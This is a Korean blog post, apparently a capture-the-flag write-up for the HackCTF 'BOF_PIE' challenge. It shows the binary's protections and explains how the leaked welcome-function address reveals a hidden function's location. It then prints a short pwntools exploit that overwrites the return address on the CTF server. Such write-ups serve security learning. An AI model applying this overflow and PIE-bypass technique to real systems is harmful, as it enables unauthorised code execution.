[hackctf] BOF_PIE

sangjun

·

2021. 4. 18. 18:58

반응형

 

문제 소스

 

보호기법

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : ENABLED
RELRO     : Partial

 

문제 분석 및 페이로드

welcome함수가 맵핑되는 주소가 leak되니 welcome함수로부터 "종현"함수까지의 거리를 알아내고 

ret을 변조시키면 된다.

from pwn import *


dns,port="ctf.j0n9hyun.xyz", 3008
p=remote(dns,port)
#
#p=process("./bof_pie")
e=ELF("./bof_pie")

p.recvuntil("is ")
addr=p.recvline()[:-1]
print addr
pay="A"*22
pay+=p32(int(addr,16)-0x79)
p.sendline(pay)
#pause()
print p.recvline()

print p.recvline() 

 

 

참고문헌 및 힘들었던 부분

1. 바이너리 분석 제대로 하기

--> 종현 함수의 주소가 릭 되는 것이 아니라 welcome함수의 주소가 릭되는 거였다ㅠㅠㅠ

반응형

'War Games > hack-ctf' 카테고리의 다른 글

[hackctf] RTL_World  (0) 2021.04.18
[hackctf] Yes or no  (0) 2021.04.18
[hackctf] offset  (0) 2021.04.18
[hackctf] Simple_Overflow_ver_2  (0) 2021.04.18
[hackctf] x64 Simple_size_BOF  (0) 2021.04.18

0개의 댓글